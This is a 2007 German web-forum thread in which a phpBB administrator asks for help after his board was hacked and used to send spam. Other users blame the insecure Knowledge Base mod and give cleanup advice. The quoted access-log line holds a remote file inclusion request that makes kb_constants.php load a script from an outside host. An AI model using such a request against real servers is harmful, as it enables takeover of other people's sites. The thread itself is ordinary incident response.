Seite 1 von 1

Board gehackt - Spamversender

Verfasst: Mi 20.Jun, 2007 09:49
von shadowrider
mein Board wurde gehackt und als Spamversender missbraucht.
Hier mal der Auszug aus dem Log:

Code: Alles auswählen

www.oldtimerfreunde-schmiechen.de***81.199.55.198 - - [20/Jun/2007:06:56:03 +0200] "POST /forum/includes/kb_constants.php?module_root_path=http://deveka.biz/tmp/dave.txt? HTTP/1.1" 200 269657 "http://www.oldtimerfreunde-schmiechen.de/forum/includes/kb_constants.php?module_root_path=http://deveka.biz/tmp/dave.txt?"
habe erst mal die kb_constants.php und eine vom Provider empfohlene htaccess eingebaut.

Der CT hatte anscheinend nichts zu beanstanden

was kann ich tun, um sowas in Zukunft zu verhindern?

Verfasst: Mi 20.Jun, 2007 10:08
von AmigaLink
Da kann man mal wieder sehen wie unsicher die KB ist. ^6

Verfasst: Mi 20.Jun, 2007 11:16
von oxpus
Da kann man mal wieder sehen wie unsicher die KB ist.
Daher flog die bei Zeiten bei mir auch raus.

@shadowrider
Bau die am besten aus, dann hast Du weniger Ärger.
Ich habe für den Ersatz bei mir auch ein "normales" Forum hergenommen, in dem die Rechte dann entsprechend vergeben sind.
Funktioniert auch und ist deutlich sicherer...

Verfasst: Mi 20.Jun, 2007 16:12
von shadowrider
in meinem Root habe ich eine Datei namens mas.php gefunden, ich hänge die mal als zip an, vieleicht kennt jemand sowas, ich glaube die gehört auch zur Spamfunktion?

Fragen über Fragen:

weshalb kann jemand in meinem Root eine Datei anlegen?

muss ich noch mit weiteren Dateien in Unterverzeichnissen rechnen? wenn ja, wie finde bzw. identifiziere ich die?

Nachtrag:
obwohl im Log die kb_conctants.php als Verursacher aufgeführt ist, konnte ich keinerlei Änderung an dieser Datei feststellen - was soll mir das jetzt sagen?

[ Attachment gelöscht am Mi 20.Jun, 2007 17:08 von oxpus ]

Verfasst: Mi 20.Jun, 2007 17:08
von oxpus
Jo, ein kleiner netter Emailer, der auch gleich alle anderen Server-Daten mitliefert. Ich habe den aus Sicherheitsgründen aber nun gelöscht.
Löschen und die KB zunächst einmal deinstallieren, bzw. den Server abdichten.

Man muss auch nicht eine PHP-Datei verändern, um Dateien auf dem Server abzulegen.
Im Root ist es dann auch für den Angreifer am einfachsten, da er sich dann nicht um Pfade kümmert.

Wie bereits geschrieben: Die KB ist alles andere als sicher und selbst mit unzähligen Fixen, die AmigaLink auf seiner Seite veröffentlicht hat, gibt es sicher noch unzählige weitere Lücken.
Ich würde die wirklich schnellstens ausbauen, alles sichern, alle (und ich meine wirklich ALLE) Passwörter ändern, die mit dem Server und den darauf gehosteten Programmen verbunden sind und erst, wenn keinen weiteren Lücken und Schäden sichtbar sind, wieder den Server ausmachen (.htaccess mit einer Umleitung oder Passwortabfrage für Debuggings würde da zum Anfang reichen).

[color=red]Kleiner Hinweis an dieser Stelle:
Dieser Emailer verwendet 2 aktive und eine "Schein"-Email Adresse. Diese wären
cladoang<at>yahoo.com
a3sgcs.<at>lokinmr
snak3r<at>gmail.com
Ich empfehle dringend, diese 3 Strassen umgehend zu bannen und nach Usern ausschau halten, die eine dieser 3 Email-Adressen verwenden![/color]

Verfasst: Mi 20.Jun, 2007 18:12
von shadowrider
wieder den Server ausmachen (.htaccess mit einer Umleitung oder Passwortabfrage für Debuggings würde da zum Anfang reichen).
den Teil habe ich nicht so recht verstanden, wäre nett wenn du hierzu genauer was sagen würdest

Verfasst: Do 21.Jun, 2007 10:38
von oxpus
Einen Passwortschutz kannst Du mit einem guten FTP-Client oder des Control Panel zu Deinem Webserver einrichten.
Dabei wird eine .htaccess im Root abgelegt, die dann ein Passwort zum Betreten der Domain verlangt.
Das ist am einfachsten...